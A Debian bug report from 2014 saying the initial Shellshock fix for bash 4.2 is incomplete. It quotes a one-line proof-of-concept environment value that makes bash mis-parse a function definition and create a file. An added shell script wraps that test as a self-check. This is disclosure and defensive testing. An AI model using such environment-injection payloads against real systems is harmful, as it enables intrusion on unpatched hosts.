Package: bash
Version: 4.2+dfsg-0.1+deb7u1
Severity: critical
Tags: security

As Tavis Ormandy has tweeted[0], the existing patch is not sufficient to solve the problem:

vauxhall ok % dpkg -l bash | grep ^ii; rm -f echo; env X='() { (a)=>\' bash -c "echo date"; cat echo
ii bash 4.2+dfsg-0.1+deb7u1 amd64 GNU Bourne Again SHell
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
Wed Sep 24 23:32:32 UTC 2014

This means all Debian systems are still vulnerable, as bash is an essential package.

[0] https://twitter.com/taviso/status/514887394294652929

-- System Information:
Debian Release: jessie/sid
APT prefers unstable
APT policy: (500, 'unstable'), (500, 'stable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.17-rc5-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages bash depends on:
ii base-files 7.5
ii dash 0.5.7-4
ii debianutils 4.4
ii libc6 2.19-11
ii libtinfo5 5.9+20140913-1

Versions of packages bash recommends:
pn bash-completion <none>

Versions of packages bash suggests:
pn bash-doc <none>

-- no debconf information

--
brian m. carlson / brian with sandals: Houston, Texas, US
+1 832 623 2791 | http://www.crustytoothpaste.net/~bmc | My opinion only
OpenPGP: RSA v4 4096b: 88AC E9B2 9196 305B A994 7552 F1BA 225C 0223 B187
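A self-check built from the command in the report above, as an added example that is not part of the original message: it runs the same test inside a scratch directory, so the stray file never lands in the working directory, and classifies the result by whether a file named `echo` appears. The function names and the exit-code convention are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the bug report). Exit codes are this example's own
# convention:
#   0 = no file named "echo" was created (this test did not trigger)
#   1 = a file named "echo" was created (the behaviour shown in the report)
#   2 = the check could not run (no such bash binary, or no scratch directory)
check_bash_import() {
    bash_bin=${1:-bash}    # name in PATH or an absolute path
    command -v "$bash_bin" >/dev/null 2>&1 || return 2
    workdir=$(mktemp -d) || return 2
    result=0
    (
        cd "$workdir" || exit 2
        # Same environment value and command as in the report. Output is
        # discarded: only the side effect (the file) is evidence.
        env X='() { (a)=>\' "$bash_bin" -c "echo date" >/dev/null 2>&1 || :
        if [ -e echo ]; then exit 1; fi
        exit 0
    ) || result=$?
    rm -rf "$workdir"
    return "$result"
}

# Human-readable wrapper around the check; returns the same status.
report_bash_import() {
    check_bash_import "$@" && rc=0 || rc=$?
    case $rc in
        0) echo "not affected: the test created no file" ;;
        1) echo "AFFECTED: the test created a file named echo, as in the report" ;;
        *) echo "check could not run" ;;
    esac
    return "$rc"
}
```

Call `report_bash_import` with no argument to test the bash found in `PATH`, or pass the absolute path of another bash binary.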